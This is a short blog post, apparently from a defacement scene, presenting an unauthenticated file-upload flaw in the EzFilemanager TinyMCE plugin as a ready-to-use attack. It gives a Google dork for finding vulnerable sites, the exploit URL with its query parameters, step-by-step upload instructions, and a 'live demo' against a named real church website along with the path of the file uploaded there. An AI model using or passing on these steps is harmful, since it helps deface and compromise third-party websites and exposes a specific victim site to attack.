EzFilemanager Deface Upload vulnerability

EzFilemanager Deface Upload vulnerability

image_2313242.original.jpg (355×338)
 


Google Dork inurl:ezfilemanager/ezfilemanager.php
(Modify this dork for getting mor results from Google =)



Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and 
put ?sa=1&type=file after URL
now url will be :  http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Now see upload option and upload you file, you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files

Live Demo : http://www.monumentbiblechurch.com/administration/jscripts/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Result : http://www.monumentbiblechurch.com/mbcphotos/files/aaaaaaaa.txt

! Leave a comment if you enjoyed this post :D

This entry was posted in

    Category

    Category

    Category